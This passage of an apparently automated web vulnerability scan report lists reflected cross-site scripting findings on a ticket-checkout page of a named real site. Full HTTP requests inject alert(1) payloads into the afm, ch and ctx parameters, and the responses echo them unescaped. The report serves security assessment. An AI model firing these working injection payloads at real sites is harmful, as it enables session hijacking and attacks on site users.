The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f2db3(a)9cb2e294b58 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /checkout/index/418563179f2db3(a)9cb2e294b58?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4AzAqqNBjoLb2Zmc2V0af6QnQ%3D%3D--a2496e9fd1e9391aea4b68370610eb89644e9f7c

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:39:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 431
ETag: "ddbd0939a8f97e966f5ed29101cf1ee7"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: bg_lvd=1311100745; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:39:05 GMT
Set-Cookie: _fancat_session=BAh7DjoPc2Vzc2lvbl9pZCIlZWFlMTRmYjAzZDgwZGJlOGUyNzE3N2NjY2E0MzZmNzY6Emxhc3RfYWNjZXNzZWRJdToJVGltZQ1y2huA%2BfJenAY6C29mZnNldGn%2BkJ06DmJnX3NyY19pZGkB%2FzoKYmdfbHBJIgH%2FaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5ZjJkYjMoYSk5Y2IyZTI5NGI1OD9jdHg9YyUzRHRpeCUzQm10JTNEaW50JTNCdHNwJTNEMCUzQmR0JTNEMSUzQmxwb3MlM0QyJmNoPWJpbmcmcXVhbnRpdHk9MiZscD10cnVlJnBvY3R4PXJhbmslM0QzNiUzQmNyYXdsU2NvcmUlM0RudWxsJTNCcG9wMSUzRDAuMDM3NCUzQnBvcDIlM0QwLjAzNzQlM0Jwb3AzJTNEMC4wMzc0JTNCJmFmbT0mdWV0PS03NzY4OTY4MzYlBjoGRUY6D2JnX3JlZmVyZXIiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWw6EGJnX3Zpc2l0X2lkaQRZDd8sOhJiZ192aXNpdG9yX2lkIhUxMzQyNTY2ODMwMjc1NTg1OhFiZ19zdHlsZV9pZHNJIgAGOwtGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQA8%3D--28b7dc6c02fdee7f14139160626eb064ce53160c; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11911
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
<![CDATA[
CheckoutInterstitialController.initialize({fbConnect: false, skipPingout: false, ticketSetId: 418563179f2db3(a)9cb2e294b58, quantity: 2, ctx: escape('c=tix;mt=int;tsp=0;dt=1;lpos=2'), fakeResult: 'none', salePrice: 62.0, roundedPrice: 62, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=null;po
...[SNIP]...

4.94. http://bing.fansnap.com/checkout/index/418563179 [afm parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bing.fansnap.com
Path:	/checkout/index/418563179

Issue detail

The value of the afm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 668a1'%3balert(1)//1b8fecb7052 was submitted in the afm parameter. This input was echoed as 668a1';alert(1)//1b8fecb7052 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=668a1'%3balert(1)//1b8fecb7052&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4AzAqqNBjoLb2Zmc2V0af6QnQ%3D%3D--a2496e9fd1e9391aea4b68370610eb89644e9f7c

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 17
ETag: "fb0f0d4f666b939a2a1e7cd630b2251a"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DRAQ6RBjoLb2Zmc2V0af6QnQ%3D%3D--bbd810f4a8f6aee49782e0c1df5f080b5dc003d9; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 12033
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
p=0;dt=1;lpos=2'), fakeResult: 'none', salePrice: 62.0, roundedPrice: 62, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;', afm: '668a1';alert(1)//1b8fecb7052' });
//]]>
...[SNIP]...

4.95. http://bing.fansnap.com/checkout/index/418563179 [ch parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bing.fansnap.com
Path:	/checkout/index/418563179

Issue detail

The value of the ch request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7bcdf'%3balert(1)//2713641b124 was submitted in the ch parameter. This input was echoed as 7bcdf';alert(1)//2713641b124 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing7bcdf'%3balert(1)//2713641b124&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4AzAqqNBjoLb2Zmc2V0af6QnQ%3D%3D--a2496e9fd1e9391aea4b68370610eb89644e9f7c

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 149
ETag: "789a7c9e1c5ee7b5c72b070ff4253e4d"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: ver=1; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:35:53 GMT
Set-Cookie: tvid=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: vid=; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:35:53 GMT
Set-Cookie: lvd=1311100553; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:35:53 GMT
Set-Cookie: _fancat_session=BAh7GDoPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4BULFuPBjoLb2Zmc2V0af6QnToLc3JjX2lkaQH%2FOgdscEkiAf9odHRwOi8vYmluZy5mYW5zbmFwLmNvbS9jaGVja291dC9pbmRleC80MTg1NjMxNzk%2FY3R4PWMlM0R0aXglM0JtdCUzRGludCUzQnRzcCUzRDAlM0JkdCUzRDElM0JscG9zJTNEMiZjaD1iaW5nN2JjZGYnJTNiYWxlcnQoMSkvLzI3MTM2NDFiMTI0JnF1YW50aXR5PTImbHA9dHJ1ZSZwb2N0eD1yYW5rJTNEMzYlM0JjcmF3bFNjb3JlJTNEbnVsbCUzQnBvcDElM0QwLjAzNzQlM0Jwb3AyJTNEMC4wMzc0JTNCcG9wMyUzRDAuMDM3NCUzQiZhZm09JnVldD0GOwdGOgxyZWZlcmVyIgGZaHR0cDovL2JpbmcuZmFuc25hcC5jb20vdTItdGlja2V0cy91Mi13aXRoLWludGVycG9sLXJlc2NoZWR1bGVkLWZyb20tNzE5L2p1bHktMjAtMjAxMS0zODk2Njk%2FdXRtX3NvdXJjZT0xOTg3JmFjaz1odHRwJTNhJTJmJTJmd3d3LmJpbmcuY29tJTJmcyUyZmFjay5odG1sOg12aXNpdF9pZGkE0EauNzoPdmlzaXRvcl9pZCIAOg5zdHlsZV9pZHNJIgAGOwdGOghsb2N7CjsQZhozMi43ODI0OTk5OTk5OTk5OTkAj1w7EWYbLTk2LjgyMDcwMDAwMDAwMDAwMgD08TsSaRI7EyIWRGFsbGFzLUZvcnQgV29ydGg7FEAa--ee1ba1006b679a9f3b53a6d54e24fc3cd43317f6; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 12049
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
ingout: false, ticketSetId: 418563179, quantity: 2, ctx: escape('c=tix;mt=int;tsp=0;dt=1;lpos=2'), fakeResult: 'none', salePrice: 62.0, roundedPrice: 62, split: ["2"], requestQty: false, channel: 'bing7bcdf';alert(1)//2713641b124', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;', afm: '' });
//]]>
...[SNIP]...

4.96. http://bing.fansnap.com/checkout/index/418563179 [ctx parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bing.fansnap.com
Path:	/checkout/index/418563179

Issue detail

The value of the ctx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b263b'%3balert(1)//2660bb145a6 was submitted in the ctx parameter. This input was echoed as b263b';alert(1)//2660bb145a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2b263b'%3balert(1)//2660bb145a6&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4AzAqqNBjoLb2Zmc2V0af6QnQ%3D%3D--a2496e9fd1e9391aea4b68370610eb89644e9f7c

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 17
ETag: "585bbfb8bfee5437fab870e41f0b9469"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4BtKQOPBjoLb2Zmc2V0af6QnQ%3D%3D--2ecf5b7e4e9f630a03eece5d12b58bfb3cee9828; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11922
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
<![CDATA[
CheckoutInterstitialController.initialize({fbConnect: false, skipPingout: false, ticketSetId: 418563179, quantity: 2, ctx: escape('c=tix;mt=int;tsp=0;dt=1;lpos=2b263b';alert(1)//2660bb145a6'), fakeResult: 'none', salePrice: 62.0, roundedPrice: 62, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;', afm: '' });
//]]>
...[SNIP]...

4.97. http://bing.fansnap.com/checkout/index/418563179 [poctx parameter] previous next

